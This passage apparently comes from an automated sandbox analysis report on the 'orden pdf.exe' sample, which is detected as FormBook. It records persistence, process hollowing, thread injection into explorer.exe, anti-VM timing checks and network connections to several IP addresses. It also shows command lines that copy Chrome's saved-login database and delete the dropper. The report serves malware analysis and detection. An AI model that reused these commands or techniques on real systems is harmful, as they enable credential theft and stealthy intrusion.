          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001CC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0017406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\FxpxJump to behavior
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\assignedaccessprovidereventsJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FxpxJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
          Source: orden pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\orden pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: orden pdf.exeVirustotal: Detection: 50%
          Source: orden pdf.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\Desktop\orden pdf.exeFile read: C:\Users\user\Desktop\orden pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\orden pdf.exe 'C:\Users\user\Desktop\orden pdf.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: unknownProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
          Source: unknownProcess created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32
          Source: C:\Windows\SysWOW64\systray.exeFile written: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: orden pdf.exeStatic file information: File size 1550336 > 1048576
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: orden pdf.exe
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: orden pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018E01E LoadLibraryA,GetProcAddress,
          Source: DeviceCensus.exe.exe.0.drStatic PE information: real checksum: 0x12169b should be: 0x18746f
          Source: cx9l_rq2dula.exe.3.drStatic PE information: real checksum: 0x12169b should be: 0x18746f
          Source: orden pdf.exeStatic PE information: real checksum: 0x12169b should be: 0x18746f
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018288B push 66001823h; retn 001Eh
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00196B05 push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018288B push 66001823h; retn 001Eh
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00196B05 push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041681F push eax; retf
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00417BCB push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C6C5 push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C77C push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C712 push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041C71B push eax; ret
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017BD0D1 push ecx; ret
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_01396B05 push ecx; ret
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exeJump to dropped file
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.urlJump to behavior
          Source: C:\Users\user\Desktop\orden pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.urlJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x93 0x37
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0019123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\orden pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\orden pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\orden pdf.exeRDTSC instruction interceptor: First address: 00000000004098B4 second address: 00000000004098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\orden pdf.exeRDTSC instruction interceptor: First address: 0000000000409B2E second address: 0000000000409B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000009398B4 second address: 00000000009398BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000939B2E second address: 0000000000939B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00409A60 rdtsc
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\explorer.exe TID: 6660Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 5592Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000003.555421786.00000000089C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluser
          Source: explorer.exe, 00000003.00000000.266986539.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.257961088.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.267948920.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.258035922.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\orden pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\orden pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00409A60 rdtsc
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0040AE10 LdrLoadDll,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C6AAF BlockInput,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0018E01E LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\Desktop\orden pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00198189 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_00198189 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_2_013981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          Benign windows process drops PE files
          Source: C:\Windows\explorer.exeFile created: cx9l_rq2dula.exe.3.dr
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\orden pdf.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\orden pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\orden pdf.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\orden pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\orden pdf.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: C90000
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AB106 LogonUserW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B411C SendInput,keybd_event,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B74BB mouse_event,
          Source: C:\Users\user\Desktop\orden pdf.exeProcess created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
          Source: explorer.exe, 00000003.00000000.239214907.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: orden pdf.exe, explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001965C4 cpuid
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001EB340 GetUserNameW,
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001A1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
